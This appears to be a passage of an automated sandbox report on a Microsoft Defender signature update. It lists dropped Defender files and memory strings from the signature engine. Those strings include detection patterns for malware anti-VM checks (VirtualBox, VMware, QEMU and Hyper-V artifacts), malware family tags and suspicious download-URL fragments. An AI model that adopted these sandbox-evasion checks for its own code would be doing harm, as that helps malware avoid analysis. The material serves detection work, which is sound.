Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to behavior
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp Binary or memory string: *VMWARE*
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: vmware-tray.exe
Source: WerFault.exe, 00000009.00000002.3010846495.0000000006164000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWPn
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: MpSigStub.exe, 00000024.00000003.6292671700.00000197A4EEE000.00000004.00000001.sdmp Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%*s%*s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000024.00000003.6293414365.00000197A317C000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: Vmware
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: $ARRAY = [ "vmtoolsd.exe" , "vbox.exe" ]
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000024.00000003.6292671700.00000197A4EEE000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp Binary or memory string: *QEMU*
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
